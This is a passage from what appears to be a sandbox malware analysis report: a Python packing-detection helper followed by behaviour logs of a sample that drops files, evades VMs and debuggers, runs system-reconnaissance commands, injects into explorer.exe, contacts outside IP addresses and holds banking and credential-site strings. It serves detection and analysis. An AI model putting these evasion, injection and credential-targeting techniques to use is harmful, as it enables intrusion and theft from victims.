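                         "entropy": round(shannon_entropy(raw), 3),
                         "rights": rights})
    return sections


def packing_indicators(pe):
    """Return human-readable findings; an empty list means no indicator fired."""
    findings = []
    for s in parse_sections(pe):
        if s["name"] not in STANDARD_NAMES:
            findings.append("non-standard section name %r" % s["name"])
        if "E" in s["rights"] and "W" in s["rights"]:
            findings.append("%s is writable and executable (%s)" % (s["name"], s["rights"]))
        if s["entropy"] > ENTROPY_THRESHOLD:
            findings.append("%s entropy %.3f exceeds %.1f" % (s["name"], s["entropy"], ENTROPY_THRESHOLD))
    return findings


def build_sample_pe(sections):
    """Construct a minimal, non-runnable PE32 image from (name, data, characteristics)
    triples so the checks can be exercised offline. Not a real sample."""
    opt = bytes(224)  # PE32 optional header size; its contents are not consulted above
    header_len = 0x40 + 4 + 20 + len(opt) + 40 * len(sections)
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)  # e_lfanew at offset 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table, body, ptr, va = b"", b"", header_len, 0x1000
    for name, data, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va,
                             len(data), ptr, 0, 0, 0, 0, chars)
        body += data
        ptr += len(data)
        va += 0x1000
    return dos + b"PE\0\0" + coff + opt + table + body


# Constructed sample: a random-byte .text marked E+R+W (stand-in for packed code),
# a plain .rdata, and a zero-filled section with a non-standard name like ".yig".
_rng = random.Random(1)
PACKED_TEXT = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_RDATA = b"KERNEL32.dll\0LoadLibraryA\0GetProcAddress\0" * 64
SAMPLE_PE = build_sample_pe([
    (".text", PACKED_TEXT, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rdata", PLAIN_RDATA, IMAGE_SCN_MEM_READ),
    (".yig", bytes(512), IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for finding in packing_indicators(SAMPLE_PE):
        print(finding)
```

    Run against a real file with `packing_indicators(open(path, "rb").read())`. The entropy threshold is a heuristic: compressed resources in .rsrc and embedded certificates also score high, so treat the writable-and-executable .text and the made-up section names as the stronger signals, as this report does.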

    Persistence and Installation Behavior

    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\DE97.exe
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\8CAE.exe
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jvgasii
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\uegasii

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\o4zpa1oi9y.exe
    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\jvgasii:Zone.Identifier read attributes | delete
    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\uegasii:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX (recorded for each of the 14 WMIC.exe instances)
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_16-884
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Roaming\jvgasiiAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Roaming\jvgasiiAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Roaming\uegasiiAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Roaming\uegasiiAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: uegasii, 0000000A.00000002.3041161604.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: DE97.exe, 00000009.00000002.2777536515.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK`]
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401E65 rdtsc 9_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_02F01016
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 431Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 933Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 692Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2388Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3093Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2561Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4410Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4277
    Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.8 %
    Source: C:\Windows\explorer.exe TID: 5692Thread sleep count: 431 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep count: 933 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep time: -93300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1176Thread sleep count: 692 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 1176Thread sleep time: -69200s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 6440Thread sleep count: 321 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3756Thread sleep count: 252 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3380Thread sleep count: 257 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5036Thread sleep count: 71 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 6948Thread sleep count: 145 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5352Thread sleep count: 115 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep count: 2388 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4904Thread sleep time: -238800s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 3500Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6436Thread sleep count: 3093 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6436Thread sleep time: -3093000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2156Thread sleep count: 2561 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2156Thread sleep time: -2561000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1224Thread sleep count: 4410 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1224Thread sleep time: -4410000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 7008Thread sleep count: 4277 > 30
    Source: C:\Windows\explorer.exe TID: 7008Thread sleep time: -4277000s >= -30000s
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00418DF0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00419024h0_2_00418DF0
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00418DF0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00419024h6_2_00418DF0
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCAFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,11_2_00007FF7CBCAFB38
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00432B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_00432B15
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00431D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_00431D4A
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00433ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_00433ED9
    Source: C:\Windows\explorer.exeCode function: 15_2_00E330A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00E330A8
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00436512 GetSystemInfo,13_2_00436512
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
    Source: 9C13.tmp.13.drBinary or memory string: discord.comVMware20,11696487552f
    Source: 8CAE.exe, 0000000B.00000002.4581484598.000002404C82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 3284951881311361583284951881\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77086-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 25/09/2023, 08:44:03\r\nSystem Manufacturer: x26YeTxoS9PSNM\r\nSystem Model: 9rl4BeBz\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: MZZAY PO849, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'954 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'215 MB\r\nVirtual Memory: In Use: 976 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: 1TK6A\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.6\r\n [02]: fe80::1480:15d6:10aa:6464\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n3284951881311361583284951881\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>GsaZnKyRMbnKXWqcpbcKkwDFLASmpJQKNxBgRoaOCNp\QZjUDmOzUXKGQ.exe,3524
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
    Source: 9C13.tmp.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3226508578.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 9C13.tmp.13.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: global block list test formVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: tasks.office.comVMware20,11696487552o
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: 9C13.tmp.13.drBinary or memory string: AMC password management pageVMware20,11696487552
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
    Source: 9C13.tmp.13.drBinary or memory string: interactivebrokers.comVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: dev.azure.comVMware20,11696487552j
    Source: 9C13.tmp.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
    Source: 9C13.tmp.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
    Source: 9C13.tmp.13.drBinary or memory string: outlook.office365.comVMware20,11696487552t
    Source: explorer.exe, 00000002.00000000.2222980107.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
    Source: 9C13.tmp.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
    Source: 9C13.tmp.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH@
    Source: 9C13.tmp.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
    Source: 8CAE.exe, 0000000B.00000002.4580154670.000002404C80E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
    Source: 9C13.tmp.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
    Source: ROUTE.EXE, 00000025.00000002.3963036050.000002EE38E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
    Source: explorer.exe, 00000002.00000000.2219776484.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
    Source: explorer.exe, 00000002.00000000.2219404532.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
    Source: 9C13.tmp.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
    Source: 9C13.tmp.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
    Source: 9C13.tmp.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
    Source: 9C13.tmp.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
    Source: 9C13.tmp.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
    Source: 9C13.tmp.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
    Source: 9C13.tmp.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401E65 rdtsc 9_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,16_2_02F01B17
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_02F01016
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,11_2_00007FF7CBCA78EC
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_005F092B mov eax, dword ptr fs:[00000030h]0_2_005F092B
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h]0_2_005F0D90
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_006222E4 push dword ptr fs:[00000030h]0_2_006222E4
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_006B092B mov eax, dword ptr fs:[00000030h]6_2_006B092B
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_006B0D90 mov eax, dword ptr fs:[00000030h]6_2_006B0D90
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_007E03C4 push dword ptr fs:[00000030h]6_2_007E03C4
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_0053092B mov eax, dword ptr fs:[00000030h]9_2_0053092B
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00530D90 mov eax, dword ptr fs:[00000030h]9_2_00530D90
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_006D5A8F push dword ptr fs:[00000030h]9_2_006D5A8F
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_0060092B mov eax, dword ptr fs:[00000030h]10_2_0060092B
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00600D90 mov eax, dword ptr fs:[00000030h]10_2_00600D90
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_007464E7 push dword ptr fs:[00000030h]10_2_007464E7
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA2654 GetProcessHeap,RtlReAllocateHeap,11_2_00007FF7CBCA2654

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\explorer.exeFile created: DE97.exe.2.drJump to dropped file
    Source: C:\Windows\explorer.exeNetwork Connect: 190.249.249.14 80Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.168 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 160.177.223.165 80Jump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeThread created: C:\Windows\explorer.exe EIP: 86819A8Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiThread created: unknown EIP: 2FC19A8Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeThread created: unknown EIP: 51B1970Jump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiThread created: unknown EIP: 2DA1970Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 3536 base: 6B79C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 1908 base: 7FF6091E2D10 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 6316 base: 6B79C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 2736 base: 7FF6091E2D10 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 1600 base: 6B79C0 value: 90Jump to behavior
